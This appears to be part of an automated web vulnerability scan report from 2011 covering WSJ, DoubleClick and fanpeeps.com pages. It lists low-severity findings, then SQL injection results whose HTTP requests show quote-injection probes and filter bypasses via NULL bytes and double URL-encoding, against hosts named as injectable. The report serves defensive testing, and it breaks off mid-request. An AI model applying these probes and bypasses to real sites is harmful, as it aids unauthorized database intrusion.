23.26. http://rea.wsj.net/javascripts/controls.js

23.27. http://rea.wsj.net/javascripts/dj-j_global_slim.js

23.28. http://rea.wsj.net/javascripts/dragdrop.js

23.29. http://s.wsj.net/djscript/j_global.js

23.30. https://services.wsj.com/Gryphon/alternateLogin2.dj

23.31. https://services.wsj.com/Gryphon/jsp/find_acct.jsp

23.32. http://sj.smartmoney.net/smscript/bucket/NA/page/0_0_SA_0001/provided/j_global/version/20110513141138.js

23.33. http://sj.smartmoney.net/smscript/bucket/NA/page/0_0_SH_0001/provided/j_global/version/20110512235911.js

23.34. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110513080738.js

23.35. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110506141003.js

23.36. http://sj.wsj.net/djscript/require/j_global_slim/version/20110512230933.js

23.37. http://sj.wsj.net/djscript/require/j_global_slim/version/20110513185311.js

23.38. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js

23.39. http://topics.wsj.com/djscript/latest/dj/widget/panels/view/SlidePanel.js

23.40. http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052

23.41. http://w.sharethis.com/button/buttons.js

23.42. http://www.dinse.com/about_the_firm/Employment.html

23.43. http://www.dinse.com/attorneys/knapp.html

23.44. http://www.dinse.com/attorneys/mckearin.html

23.45. http://www.dinse.com/attorneys/monahan.html

23.46. http://www.dinse.com/contact/email.html

23.47. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

23.48. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

23.49. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12

23.50. http://www.mcafeesecure.com/us/products/buy_now.jsp

23.51. https://www.mcafeesecure.com/SignUp.sa

23.52. https://www.mcafeesecure.com/us/products/buy_now.jsp

23.53. http://www.siteadvisor.com/script/widget.js

24. Private IP addresses disclosed

24.1. http://connect.facebook.net/en_US/all.js

24.2. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

24.3. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

24.4. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

24.5. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.6. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.7. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/-bv7QJTbOXU.css

24.8. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js

24.9. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css

24.10. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/nMKlWCMk1wz.js

24.11. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

24.12. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png

24.13. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

24.14. http://www.facebook.com/extern/login_status.php

24.15. http://www.facebook.com/extern/login_status.php

24.16. http://www.facebook.com/extern/login_status.php

24.17. http://www.facebook.com/extern/login_status.php

24.18. http://www.facebook.com/extern/login_status.php

24.19. http://www.facebook.com/extern/login_status.php

24.20. http://www.facebook.com/extern/login_status.php

24.21. http://www.facebook.com/extern/login_status.php

24.22. http://www.facebook.com/extern/login_status.php

24.23. http://www.facebook.com/extern/login_status.php

24.24. http://www.facebook.com/extern/login_status.php

24.25. http://www.facebook.com/extern/login_status.php

24.26. http://www.facebook.com/extern/login_status.php

24.27. http://www.facebook.com/extern/login_status.php

24.28. http://www.facebook.com/extern/login_status.php

24.29. http://www.facebook.com/extern/login_status.php

24.30. http://www.facebook.com/extern/login_status.php

24.31. http://www.facebook.com/extern/login_status.php

24.32. http://www.facebook.com/extern/login_status.php

24.33. http://www.facebook.com/extern/login_status.php

24.34. http://www.facebook.com/extern/login_status.php

24.35. http://www.facebook.com/extern/login_status.php

24.36. http://www.facebook.com/extern/login_status.php

24.37. http://www.facebook.com/extern/login_status.php

24.38. http://www.facebook.com/plugins/fan.php

24.39. http://www.facebook.com/plugins/fan.php

24.40. http://www.facebook.com/plugins/fan.php

24.41. http://www.facebook.com/plugins/fan.php

24.42. http://www.facebook.com/plugins/fan.php

24.43. http://www.facebook.com/plugins/like.php

24.44. http://www.facebook.com/plugins/like.php

24.45. http://www.facebook.com/plugins/like.php

24.46. http://www.facebook.com/plugins/like.php

24.47. http://www.facebook.com/plugins/like.php

24.48. http://www.facebook.com/plugins/like.php

24.49. http://www.facebook.com/plugins/like.php

24.50. http://www.facebook.com/plugins/like.php

24.51. http://www.facebook.com/plugins/like.php

24.52. http://www.facebook.com/plugins/like.php

24.53. http://www.facebook.com/plugins/like.php

24.54. http://www.facebook.com/plugins/like.php

24.55. http://www.facebook.com/plugins/like.php

24.56. http://www.facebook.com/plugins/like.php

24.57. http://www.facebook.com/plugins/like.php

24.58. http://www.facebook.com/plugins/like.php

24.59. http://www.facebook.com/plugins/like.php

24.60. http://www.facebook.com/plugins/like.php

24.61. http://www.facebook.com/plugins/like.php

24.62. http://www.facebook.com/plugins/like.php

24.63. http://www.facebook.com/plugins/like.php

24.64. http://www.facebook.com/plugins/like.php

24.65. http://www.facebook.com/plugins/like.php

24.66. http://www.facebook.com/plugins/like.php

24.67. http://www.facebook.com/plugins/like.php

24.68. http://www.facebook.com/plugins/like.php

24.69. http://www.facebook.com/plugins/like.php

24.70. http://www.facebook.com/plugins/like.php

24.71. http://www.facebook.com/plugins/like.php

24.72. http://www.facebook.com/plugins/like.php

24.73. http://www.facebook.com/plugins/like.php

24.74. http://www.facebook.com/plugins/like.php

24.75. http://www.facebook.com/plugins/likebox.php

24.76. http://www.facebook.com/plugins/likebox.php

24.77. http://www.facebook.com/plugins/recommendations.php

24.78. http://www.facebook.com/widgets/recommendations.php

24.79. http://www.gomeznetworks.com/css/GomezTheme.css

24.80. http://www.gomeznetworks.com/css/GomezTheme.css

24.81. http://www.gomeznetworks.com/images/theme/compuware_gomez_logo.png

24.82. http://www.gomeznetworks.com/images/theme/compuware_gomez_logo.png

24.83. http://www.gomeznetworks.com/images/theme/platform_theme.png

24.84. http://www.gomeznetworks.com/images/theme/platform_theme.png

24.85. http://www.gomeznetworks.com/tempstyle.css

24.86. http://www.google.com/sdch/vD843DpA.dct

24.87. http://www.marketwatch.com/bg/api/Connect.ashx

24.88. http://www.marketwatch.com/bg/api/Connect.ashx

24.89. http://www.marketwatch.com/bg/api/Connect.ashx

24.90. http://www.marketwatch.com/bg/api/Connect.ashx

24.91. http://www.marketwatch.com/bg/api/Connect.ashx

24.92. http://www.marketwatch.com/bg/api/Connect.ashx

24.93. http://www.marketwatch.com/bg/api/Connect.ashx

24.94. http://www.marketwatch.com/bg/api/Connect.ashx

24.95. http://www.marketwatch.com/bg/api/Connect.ashx

24.96. http://www.marketwatch.com/bg/api/Connect.ashx

25. Robots.txt file

25.1. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend

25.2. http://allthingsd.com/

25.3. http://altfarm.mediaplex.com/ad/js/13754-86576-1281-0

25.4. http://amch.questionmarket.com/adscgen/st.php

25.5. http://api.bizographics.com/v1/profile.json

25.6. http://api.twitter.com/receiver.html

25.7. http://b.scorecardresearch.com/r

25.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.9. http://c.statcounter.com/t.php

25.10. http://cache-01.cleanprint.net/cp/ccg

25.11. http://cheetah.vizu.com/c.gif

25.12. http://commerce.wsj.com/auth/login

25.13. https://commerce.wsj.com/auth/forgotpass

25.14. http://coretomic.com/

25.15. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/standard

25.16. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

25.17. http://fls.doubleclick.net/activityi

25.18. http://gg.google.com/csi

25.19. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1033560366/

25.20. http://i1.marketwatch.com/MW5/content/business/css/marketwatch.member.css

25.21. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css

25.22. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css

25.23. http://idolpeeps.com/

25.24. http://images.apple.com/global/nav/scripts/globalnav.js

25.25. http://images.scanalert.com/images/liveperson/set03/repoffline.gif

25.26. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js

25.27. http://itunes.apple.com/us/app/wsj-house-of-the-day/id418203198

25.28. http://json6.ringrevenue.com/6/map_number

25.29. http://jtools.smartmoney.com/marketspectrum/spectrumServer

25.30. http://kara.allthingsd.com/20110513/dear-yahoo-board-your-investors-are-on-line-2-and-theyre-not-happy/

25.31. http://maps.google.com/maps/api/js

25.32. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

25.33. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252

25.34. http://mp.apmebf.com/ad/js/13754-86576-1281-0

25.35. http://mt0.googleapis.com/vt

25.36. http://mt1.googleapis.com/vt

25.37. http://odb.outbrain.com/utils/ping.html

25.38. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s77142258654348

25.39. http://online.barrons.com/home

25.40. http://online.wsj.com/

25.41. http://p.opt.fimserve.com/bht/

25.42. http://pixel.quantserve.com/pixel

25.43. http://pubads.g.doubleclick.net/gampad/ads

25.44. http://puma.vizu.com/cdn/00/00/18/39/smart_tag.js

25.45. http://r.mzstatic.com/htmlResources/5176/web-storefront-base.cssz

25.46. http://rea.wsj.net/javascripts/dragdrop.js

25.47. http://realestate.wsj.com/for-sale/us/10010

25.48. http://s.fins.com/CombineScriptHandler.ashx

25.49. http://s.marketwatch.com/public/resources/documents/PixelTracking.html

25.50. http://safebrowsing.clients.google.com/safebrowsing/downloads

25.51. http://search.twitter.com/search.json

25.52. http://static.2mdn.net/default.htm

25.53. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.54. http://toolbarqueries.clients.google.com/tbproxy/af/query

25.55. http://topics.barrons.com/person/S/michael-santoli/6041

25.56. http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052

25.57. http://traffic.outbrain.com/network/redir

25.58. http://twitter.com/WSJHouse

25.59. http://urlquery.net/

25.60. http://www.bizographics.com/collect/

25.61. http://www.dinse.com/news_events.html

25.62. http://www.facebook.com/widgets/recommendations.php

25.63. http://www.fins.com/

25.64. http://www.google-analytics.com/ga.js

25.65. http://www.googleadservices.com/pagead/conversion/1033560366/

25.66. http://www.marketwatch.com/

25.67. http://www.mcafeesecure.com/RatingVerify

25.68. https://www.mcafeesecure.com/us/products/buy_now.jsp

25.69. http://www.midphase.com/

25.70. http://www.smartmoney.com/

26. Cacheable HTTPS response

26.1. https://services.wsj.com/Gryphon/alternateLogin2.dj

26.2. https://services.wsj.com/Gryphon/images/logo.png

26.3. https://www.mcafeesecure.com/include/js/global.js

26.4. https://www.mcafeesecure.com/include/js/home_menu.js

26.5. https://www.mcafeesecure.com/include/js/menu.js

26.6. https://www.mcafeesecure.com/include/js/menutabs.js

26.7. https://www.mcafeesecure.com/include/js/tabs.js

27. Multiple content types specified

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone

28.2. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free

28.3. http://ad.doubleclick.net/adi/barrons.com/columnist

28.4. http://ad.doubleclick.net/adi/barrons.com/daily_barronstake

28.5. http://ad.doubleclick.net/adi/barrons.com/mag_streetwise

28.6. http://ad.doubleclick.net/adi/barrons.com/public_front

28.7. http://ad.doubleclick.net/adi/barrons.com/public_other

28.8. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans

28.9. http://ad.doubleclick.net/adi/brokerbutton.smartmoney.com/partner_center

28.10. http://ad.doubleclick.net/adi/brokerbuttons.barrons.com/barrons_subfront

28.11. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/frontpage

28.12. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/markets_futuremovers

28.13. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/mutualfunds_jaffe

28.14. http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/personalfinance_story

28.15. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/rej_front

28.16. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

28.17. http://ad.doubleclick.net/adi/interactive.wsj.com/asia_houseoftheday

28.18. http://ad.doubleclick.net/adi/interactive.wsj.com/business_econ_front

28.19. http://ad.doubleclick.net/adi/interactive.wsj.com/default

28.20. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword

28.21. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

28.22. http://ad.doubleclick.net/adi/interactive.wsj.com/houseoftheday

28.23. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front

28.24. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory

28.25. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel

28.26. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor

28.27. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front

28.28. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot

28.29. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop

28.30. http://ad.doubleclick.net/adi/interactive.wsj.com/topics

28.31. http://ad.doubleclick.net/adi/interactive.wsj.com/us_houseoftheday

28.32. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend

28.33. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel

28.34. http://ad.doubleclick.net/adi/marketwatch.com/frontpage

28.35. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe

28.36. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front

28.37. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front

28.38. http://ad.doubleclick.net/adi/smartmoney.com/tool_module

28.39. http://allthingsd.com/display_cookie_notice/

28.40. http://amch.questionmarket.com/adscgen/st.php

28.41. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.42. http://fanpeeps.com/

28.43. http://fanpeeps.com/PURPBG1.png

28.44. http://fanpeeps.com/SCALE20.gif

28.45. http://fanpeeps.com/bg2.jpg

28.46. http://fanpeeps.com/function.fopen

28.47. http://fanpeeps.com/greybox/AJS.js

28.48. http://fanpeeps.com/greybox/gb_scripts.js

28.49. http://fanpeeps.com/greybox/gb_styles.css

28.50. http://fanpeeps.com/media/

28.51. http://fanpeeps.com/media/blueactive2.gif

28.52. http://fanpeeps.com/mlb

28.53. http://fanpeeps.com/nba

28.54. http://fanpeeps.com/ncaa

28.55. http://fanpeeps.com/ncaa2.php

28.56. http://fanpeeps.com/nfl

28.57. http://fanpeeps.com/thumbnailviewer.css

28.58. http://fanpeeps.com/thumbnailviewer.js

28.59. http://fanpeeps.com/twitterlib.js

28.60. http://fanpeeps.com/worldcup

28.61. http://fls.doubleclick.net/activityi

28.62. http://mediacdn.disqus.com/1305332303/build/system/def.html

28.63. http://mediacdn.disqus.com/1305332303/build/system/reply.html

28.64. http://mediacdn.disqus.com/1305332303/build/system/upload.html

28.65. http://odb.outbrain.com/utils/ping.html

28.66. http://online.barrons.com//static_html_files/addineyeV2.html

28.67. http://online.wsj.com/doubleclick/DARTIframe.html

28.68. http://online.wsj.com/internal/ModTwitWSJPersonalFin.htm

28.69. http://online.wsj.com/internal/ModTwitWSJRealEstate.htm

28.70. http://online.wsj.com/static_html_files/MSNSponsoredLinks.html

28.71. http://online.wsj.com/static_html_files/WSJThirdParty_Footer_Nav.html

28.72. http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html

28.73. https://order.wsj.com/favicon.ico

28.74. http://ping.chartbeat.net/ping

28.75. http://promos.mcafee.com/favicon.ico

28.76. http://server.iad.liveperson.net/hcp/integration/hackersafe/hackersafe-grey.html

28.77. http://static.2mdn.net/default.htm

28.78. http://topics.wsj.com/api-video/get_video_info.asp

28.79. http://use.typekit.com/k/uhh2the-e.css

28.80. http://www.cerebel.com/

28.81. http://www.cerebel.com/contact.php

28.82. http://www.cerebel.com/greenlinks.ico

28.83. http://www.cerebel.com/greybox/loader_frame.html

28.84. http://www.fanpeeps.com/

28.85. http://www.fanpeeps.com/bg2.jpg

28.86. http://www.fanpeeps.com/media/blueactive2.gif

28.87. http://www.marketwatch.com/cdn_content/business/re.html

28.88. http://www.marketwatch.com/doubleclick/DARTIframe.html

29. Content type incorrectly stated

29.1. http://0d7292.r.axf8.net/mr/a.gif

29.2. http://72d329.r.axf8.net/mr/a.gif

29.3. http://a1.twimg.com/profile_images/409944203/blueaspiicon_normal.gif

29.4. http://a2.twimg.com/profile_images/362264839/Pilon-Mary-colhed_normal.gif

29.5. http://allthingsd.com/

29.6. http://amch.questionmarket.com/adscgen/st.php

29.7. http://api.twitter.com/1/urls/resolve.json

29.8. http://b.scorecardresearch.com/favicon.ico

29.9. http://barrons.wsj.net/public/resources/documents/ac_keyword_exception_list.js

29.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

29.11. http://catrg.peer39.net/145/200/206100145

29.12. http://catrg.peer39.net/239/415/1360207739

29.13. http://catrg.peer39.net/306/63/1141031806

29.14. http://catrg.peer39.net/313/386/376693313

29.15. http://catrg.peer39.net/36/210/1382605036

29.16. http://catrg.peer39.net/384/75/2076037884

29.17. http://catrg.peer39.net/83/435/1736717583

29.18. http://coretomic.com/CN/script/Validate.js

29.19. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

29.20. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.80x80.png

29.21. http://cs.wsj.net/community/content/images/misc/groups/persfinancepiggybank.80x80.png

29.22. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

29.23. http://fanpeeps.com/horizontalbuttons1.css

29.24. http://fanpeeps.com/horizontaltabs1.css

29.25. http://i4.marketwatch.com/MW5/content/Story/Images/icon-thumb.gif

29.26. http://images.apple.com/global/nav/scripts/globalnav.js

29.27. http://images.scanalert.com/images/favicon.mcafeesecure.ico

29.28. http://json6.ringrevenue.com/images/generic/logo.png

29.29. http://kara.allthingsd.com/

29.30. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.31. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

29.32. http://online.barrons.com/mdc/public/js/9_3001_Refresh_HP.js

29.33. http://online.barrons.com/scorecard/SC_BEAR_O_2011_L.json

29.34. http://online.barrons.com/scorecard/SC_BEAR_P_2011_L.json

29.35. http://online.barrons.com/scorecard/SC_BULL_O_2011_L.json

29.36. http://online.barrons.com/scorecard/SC_BULL_P_2011_L.json

29.37. http://online.wsj.com/djscript/latest/dojo/cldr/nls/en/number.js

29.38. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

29.39. https://order.wsj.com/sub/f3/offer_form

29.40. http://rt.disqus.com/forums/realtime-cached.js

29.41. http://s.wsj.net/img/sm/textResizeIcons.gif

29.42. http://s.wsj.net/public/resources/documents/ac_keyword_exception_list.js

29.43. http://s1.wsj.net/img/nav_bg_wknd.gif

29.44. http://s3.wsj.net/img/bg-liveMarketUpdates.jpg

29.45. http://s4.wsj.net/img/icon_facebook_m.gif

29.46. http://server.iad.liveperson.net/hcp/html/mTag.js

29.47. https://services.wsj.com/Gryphon/images/logo.png

29.48. http://topics.wsj.com/api-video/get_video_info.asp

29.49. http://twitter.com/account/available_features

29.50. http://www.dinse.com/include/standart_lib.js

29.51. http://www.facebook.com/extern/login_status.php

29.52. http://www.fanpeeps.com/horizontalbuttons1.css

29.53. http://www.fanpeeps.com/horizontaltabs1.css

29.54. http://www.google.com/realtimejs

29.55. http://www.idolpeeps.com/images/peep3/subjects/1th.jpg

29.56. http://www.idolpeeps.com/images/peep3/subjects/2th.jpg

29.57. http://www.idolpeeps.com/images/peep3/subjects/3th.jpg

29.58. http://www.idolpeeps.com/images/peep3/subjects/4th.jpg

29.59. http://www.idolpeeps.com/images/peep3/subjects/5th.jpg

29.60. http://www.idolpeeps.com/images/peep3/subjects/6th.jpg

29.61. http://www.marketwatch.com/bg/api/Pickup.ashx

29.62. http://www.mcafeesecure.com/include/js/global.js

29.63. http://www.mcafeesecure.com/include/js/home_menu.js

29.64. http://www.mcafeesecure.com/include/js/menu.js

29.65. http://www.mcafeesecure.com/include/js/menutabs.js

29.66. http://www.mcafeesecure.com/include/js/slideshow.js

29.67. http://www.mcafeesecure.com/include/js/tabs.js

29.68. https://www.mcafeesecure.com/include/js/global.js

29.69. https://www.mcafeesecure.com/include/js/home_menu.js

29.70. https://www.mcafeesecure.com/include/js/menu.js

29.71. https://www.mcafeesecure.com/include/js/menutabs.js

29.72. https://www.mcafeesecure.com/include/js/tabs.js

29.73. http://www.siteadvisor.com/images/logo.gif

29.74. http://www.smartmoney.com/remote/commentHandler/do/commentcount/

30. Content type is not specified

30.1. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/standard

30.2. http://lq.smartmoney.net/q

30.3. http://server.iad.liveperson.net/hc/10599399/

30.4. http://traffic.outbrain.com/network/redir



1. SQL injection  next
There are 92 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/bottom.interactive.wsj.com/business_econ_front

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:14:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3429

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Wed Nov 10 02:53:44 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
ript>');document.write('\n \n');


var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://www.unigo.com/wsj/';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/1146650/JIE_UnigoFail_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://www.unigo.com/wsj/';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1146650/JIE_Unig
...[SNIP]...

Request 2

GET /adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:14:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3521

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Tue Jan 05 23:47:09 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

1.2. http://fanpeeps.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18095

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.3. http://fanpeeps.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
